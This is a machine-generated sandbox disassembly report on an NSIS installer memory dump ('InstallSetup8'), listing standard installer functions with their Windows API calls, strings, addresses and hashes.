TEMP, xrefs: 0040385A
NSIS Error, xrefs: 00403695
\Temp, xrefs: 0040382C
Error launching installer, xrefs: 004038FD
Low, xrefs: 00403848
~nsu%X.tmp, xrefs: 004039A8
SeShutdownPrivilege, xrefs: 00403AD8
UXTHEME, xrefs: 00403620, 00403625, 0040362B

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Process$CloseDirectoryExit$CreateCurrentDeleteEnvironmentFindHandlePathTempTokenVariableVersionWindowslstrcatlstrlen$AdjustAttributesCharCommandCopyErrorFirstInfoInitializeLineLookupModeMoveNextOpenPrivilegePrivilegesUninitializeValuelstrcpynwsprintf
String ID: Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu%X.tmp
API String ID: 1813718867-2779336553
Opcode ID: 32ccfccbee9d2f95e380080254fd3e205a9f5d358a382af22345ff9c53e9cdef
Instruction ID: 6c1349364f4d22fadfcc29bbd5f82b0434b4f5ba6e08f6571c64e8404a3f48da
Opcode Fuzzy Hash: 32ccfccbee9d2f95e380080254fd3e205a9f5d358a382af22345ff9c53e9cdef
Instruction Fuzzy Hash: 64F10270604301ABD320AF659D45B2B7AE8EF8570AF10483EF581B22D1DB7DDA45CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040571B Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405779
GetDlgItem.USER32(?,000003EE), ref: 00405788
GetClientRect.USER32(?,?,00000004), ref: 004057C5
GetSystemMetrics.USER32(00000002), ref: 004057CC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004057ED
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057FE
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405811
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040581F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405832
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405854
ShowWindow.USER32(?,00000008), ref: 00405868
GetDlgItem.USER32(?,000003EC,?,0000001B,000000FF), ref: 00405889
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405899
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004058B2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004058BE
GetDlgItem.USER32(?,000003F8), ref: 00405797

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

GetDlgItem.USER32(?,000003EC,00000000,?), ref: 004058DB
CreateThread.KERNEL32(00000000,00000000,Function_000056AF,00000000), ref: 004058E9
CloseHandle.KERNEL32(00000000), ref: 004058F0
ShowWindow.USER32(00000000), ref: 00405914
ShowWindow.USER32(?,00000008), ref: 00405919
ShowWindow.USER32(00000008), ref: 00405963
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405997
CreatePopupMenu.USER32 ref: 004059A8
AppendMenuW.USER32(00000000,00000000,00000001,00000000,00000000,000000E1), ref: 004059BC
GetWindowRect.USER32(?,?), ref: 004059DC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059F5
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A2D
OpenClipboard.USER32(00000000), ref: 00405A3D
EmptyClipboard.USER32 ref: 00405A43
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A4F
GlobalLock.KERNEL32(00000000), ref: 00405A59
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A6D
GlobalUnlock.KERNEL32(00000000), ref: 00405A8D
SetClipboardData.USER32(0000000D,00000000), ref: 00405A98
CloseClipboard.USER32 ref: 00405A9E

Strings

{, xrefs: 00405981

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction ID: 234ab3d0ec1f6487b719ed7b99e1d6b4405f443d9e8d78e252fa94ab3ac4d3a1
Opcode Fuzzy Hash: 6951b3530aa72caf7521df0bf8db88f5d1408e2bb92485539c1303395de87c8c
Instruction Fuzzy Hash: 34B139B1900608FFDB11AF60DD89AAE7B79FB48355F00813AFA41BA1A0C7785A51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 004049C7 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 00404A16
SetWindowTextW.USER32(00000000,?,?), ref: 00404A40
SHBrowseForFolderW.SHELL32(?,0042B240,?), ref: 00404AF1
CoTaskMemFree.OLE32(00000000), ref: 00404AFC
lstrcmpiW.KERNEL32(004326A0,0042CA68,00000000,?,?), ref: 00404B2E
lstrcatW.KERNEL32(?,004326A0), ref: 00404B3A
SetDlgItemTextW.USER32(?,000003FB,?,?), ref: 00404B4C

Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83,000003FB,?), ref: 00405BAE

Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
Part of subcall function 00406805: CharNextW.USER32(?,0043F000,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
Part of subcall function 00406805: CharPrevW.USER32(?,?,00009292,00441800,00000000,0040350D,00441800,00441800,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F

GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A

Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
Part of subcall function 00404D83: wsprintfW.USER32(00000000,0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E2D
Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40

Strings

A, xrefs: 00404AEA

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00405C63 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00009292,00441800,0043F000), ref: 00405C8C
lstrcatW.KERNEL32(0042EA70,\*.*,0042EA70,?,?,00009292,00441800,0043F000), ref: 00405CD4
lstrcatW.KERNEL32(?,0040A014,?,0042EA70,?,?,00009292,00441800,0043F000), ref: 00405CF7
lstrlenW.KERNEL32(?,?,0040A014,?,0042EA70,?,?,00009292,00441800,0043F000), ref: 00405CFD
FindFirstFileW.KERNEL32(0042EA70,?,?,?,0040A014,?,0042EA70,?,?,00009292,00441800,0043F000), ref: 00405D0D
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405DAD
FindClose.KERNEL32(00000000), ref: 00405DBC

Strings

\*.*, xrefs: 00405CCE
pB, xrefs: 00405CBC

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*$pB
API String ID: 2035342205-1006940126
Opcode ID: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
Instruction ID: 3df5019795aaf58f6817f8e3609a5bcb0d9fa216103f8ca083ea3247371bac5c
Opcode Fuzzy Hash: 22bb0f4a0285bec378f517b8b25bc548c1454a96ed25189fc1485adbf29640f7
Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 004068B4 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00009292,0042FAB8,0042F270,00405F77,0042F270,0042F270,00000000,0042F270,0042F270,00009292,?,00441800,00405C83,?,00009292,00441800), ref: 004068BF
FindClose.KERNEL32(00000000), ref: 004068CB

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9

Uniqueness

Uniqueness Score: -1.00%

Function 004021AF Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00402910 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F5B
GetDlgItem.USER32(?,00000408), ref: 00404F66
GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
DeleteObject.GDI32(00000000), ref: 0040503D
SendMessageW.USER32(?,00000143,00000000,00000000,00000000,?), ref: 00405068
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
SendMessageW.USER32(?,00001132,00000000,?,?,00000016,?,?,00000015,?), ref: 0040510F
SendMessageW.USER32(?,0000110A,00000003,00000110,?,00000016,?,?,00000015,?), ref: 0040513F

Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519

SendMessageW.USER32(?,00001132,00000000,?,?,00000016,?,?,00000015,?), ref: 00405153
GetWindowLongW.USER32(?,000000F0,?,00000016,?,?,00000015,?), ref: 00405181
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
ShowWindow.USER32(?,00000005), ref: 0040519F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
SendMessageW.USER32(?,00000420,00000000,00000020,00000020), ref: 00405338
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
ImageList_Destroy.COMCTL32(?), ref: 0040536D
GlobalFree.KERNEL32(?), ref: 0040537D
SendMessageW.USER32(?,0000014E,00000000,00000000,00000000), ref: 004053F6
SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
ShowWindow.USER32(?,00000000), ref: 00405527
GetDlgItem.USER32(?,000003FE,00000000), ref: 00405532
ShowWindow.USER32(00000000), ref: 00405539

Strings

, xrefs: 00405511
N, xrefs: 004051D8
M, xrefs: 004050F7

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403FD7 Relevance: 51.4, APIs: 34, Instructions: 357windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
ShowWindow.USER32(?), ref: 00404033
GetWindowLongW.USER32(?,000000F0), ref: 00404045
ShowWindow.USER32(?,00000004), ref: 0040405E
DestroyWindow.USER32 ref: 00404072
SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
GetDlgItem.USER32(?,?), ref: 004040AA
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
IsWindowEnabled.USER32(00000000), ref: 004040C5
GetDlgItem.USER32(?,00000001), ref: 00404170
GetDlgItem.USER32(?,00000002), ref: 0040417A
SetClassLongW.USER32(?,000000F2,?,0000001C,000000FF), ref: 00404194
SendMessageW.USER32(0000040F,00000000,00000001,?,00000000), ref: 004041E5
GetDlgItem.USER32(?,00000003,?,FFFFFC1A,?,?,FFFFFC1B,?,?,FFFFFC19,?,00444000,?,0000040B), ref: 0040428B
ShowWindow.USER32(00000000,?), ref: 004042AC
EnableWindow.USER32(?,?), ref: 004042BE
EnableWindow.USER32(?,?), ref: 004042D9
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
EnableMenuItem.USER32(00000000), ref: 004042F6
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
SetWindowTextW.USER32(?,0042CA68,00000000,0042CA68,?,0042CA68,00000000), ref: 0040435F
ShowWindow.USER32(?,0000000A), ref: 00404493

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Window$Item$MessageSendShow$EnableLong$Menu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 1860320154-0
Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00403C29 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00406978

lstrcatW.KERNEL32(00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,00009292,00441800,00000000,0043F000,00008001), ref: 00403CAA
lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,00009292), ref: 00403D2A
lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800,0043F800,00441000,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,00009292), ref: 00403D91

Part of subcall function 0040649E: wsprintfW.USER32(0042BA48,00408418,?,00406786,004326A0,00000000,0042BA48,?,?,00000000,00000000,?,000091FE), ref: 004064AB

RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0,RichEd20), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

.DEFAULT\Control Panel\International, xrefs: 00403C95
RichEdit20W, xrefs: 00403E75, 00403E7B
RichEd20, xrefs: 00403E57
_Nb, xrefs: 00403DAD, 00403E15
RichEdit, xrefs: 00403E84
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
.exe, xrefs: 00403D37
RichEd32, xrefs: 00403E65

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1115850852
Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00404695 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001,?,00000023,?,?,00000022,?), ref: 00404733
GetDlgItem.USER32(?,000003E8,?), ref: 00404747
SendMessageW.USER32(00000000,0000045B,00000001,00000000,00000000), ref: 00404764
GetSysColor.USER32(?), ref: 00404775
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
lstrlenW.KERNEL32(?), ref: 00404796
SendMessageW.USER32(00000000,00000435,00000000,00000000,?), ref: 004047A3
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
GetDlgItem.USER32(?,0000040A,000000F0,00000000,00000000), ref: 00404811
SendMessageW.USER32(00000000), ref: 00404818
GetDlgItem.USER32(?,000003E8), ref: 00404843
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
LoadCursorW.USER32(00000000,00007F02), ref: 00404894
SetCursor.USER32(00000000), ref: 00404897
LoadCursorW.USER32(00000000,00007F00,0000070B,004326A0,00000001), ref: 004048B0
SetCursor.USER32(00000000), ref: 004048B3
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4

Strings

N, xrefs: 00404831

Memory Dump Source

Source File: 0000000A.00000002.2047234895.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2047215245.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047253255.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047271020.000000000040A000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000A.00000002.2047292358.0000000000445000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
